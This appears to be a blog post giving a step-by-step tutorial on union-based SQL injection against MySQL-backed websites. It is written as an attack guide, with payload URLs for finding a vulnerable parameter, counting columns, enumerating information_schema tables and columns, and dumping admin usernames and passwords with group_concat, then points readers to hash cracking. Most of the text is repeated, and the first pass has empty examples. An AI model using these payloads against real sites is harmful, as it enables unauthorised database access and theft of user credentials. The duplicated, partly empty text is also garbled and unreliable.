Tech Directions
There are many types of sql injection but in this tutorial I will explain how you can extract columns ,tables containing useful data such as passwords ,user id , emails , admin pass and id .. etc
Now we need to find the number of columns in current table
For this we use “order by” commond Add order by 1 --
To the end of the url . Increase the numbers till we get a error message
Example:-
And so on till we get a error message
Say we get a error message when we enter order by 5 --
Then number of columns in data base is 4
Now we use the “ union all select “ commond to find the vulnerable column
Add union all select + the number of columns that we found in the last step
Example:-
Now we should we should find some numbers popping out
Say we find one number 3 then column 3 is vulnerable
We can find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
Now we must see the version of Msql at place where the number popped out in the previous step .If it is above 5 continue reading . If it is 4 and below then you have to brute force or guess the table and column names .
Now we need to find all the table names in the database. To do this we use the following commands
table_name ,information_schema.tables
Example:-
Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as admin tables or member or user tables. And so on
Now we must find all the column names in the database, to do this we use the following command “group_concat(column_name) “,
Example:-
Now look for interesting names such as user name ,id ,email and password.
And so on
Finally we need to dump the data from the columns corresponding to the tables
For this we use the following command group_concat
Now say we want to get the “user id“ ,"username" and "password" fields, from table "admin" we use group_concat command
Example:-
If the command is successful we must find the user id , user name , password
Example :-
Most of the times the passwords are cyrpted to crack them refer my posts on Hashes and Salts
Exploiting The Vulnerability
Now say we have found a vulnerable site add ‘ at the end of the url and if it returns with a
Now say we have found a vulnerable site add ‘ at the end of the url and if it returns with a
Error message then the site is vulnerable
Example:-
Example:-
www.vulnarable site.net/articles.php?id =1 ‘
Now we need to find the number of columns in current table
For this we use “order by” commond Add order by 1 --
To the end of the url . Increase the numbers till we get a error message
Example:-
www.vulnarable site.net/articles.php?id =1 order by 1--
www.vulnarable site.net/articles.php?id =1 order by 2--
www.vulnarable site.net/articles.php?id =1 order by 3--
www.vulnarable site.net/articles.php?id =1 order by 4--
www.vulnarable site.net/articles.php?id =1 order by 5 --
And so on till we get a error message
Say we get a error message when we enter order by 5 --
Then number of columns in data base is 4
Now we use the “ union all select “ commond to find the vulnerable column
Add union all select + the number of columns that we found in the last step
Example:-
www.vulnarable site.net/articles.php?id =1 union all select 1,2,3,4 --
Now we should we should find some numbers popping out
Say we find one number 3 then column 3 is vulnerable
We can find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user() , database(),version(),@@user,@@version,@@database
First thing is to find the version of Mysql we add “@@ version “replacing the vulnerable column
Example:-
Example:-
www.vulnarable site.net/articles.php?id =1 union all select 1,2,@@version ,4 --
Now we must see the version of Msql at place where the number popped out in the previous step .If it is above 5 continue reading . If it is 4 and below then you have to brute force or guess the table and column names .
Now we need to find all the table names in the database. To do this we use the following commands
table_name ,information_schema.tables
Example:-
www.vulnarable site.net/articles.php?id =1 Union all select 1,2,table_name,4 from information_schema.tables --
Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as admin tables or member or user tables. And so on
Now we must find all the column names in the database, to do this we use the following command “group_concat(column_name) “,
Example:-
www.vulnerable site.net/articles.php?id =1 Union all select 1,2,group_concat(column_name) ,4 from information_schema.columns --
Now look for interesting names such as user name ,id ,email and password.
And so on
Finally we need to dump the data from the columns corresponding to the tables
For this we use the following command group_concat
Now say we want to get the “user id“ ,"username" and "password" fields, from table "admin" we use group_concat command
Example:-
www.vulnerable site.net/articles.php?id =1 Union all select 1,2,group_concat(user id ,0x3a, username,0x3a,password),4 from admin--
If the command is successful we must find the user id , user name , password
Example :-
1 . admin : pass
2 . user : password
Most of the times the passwords are cyrpted to crack them refer my posts on Hashes and Salts
Post a Comment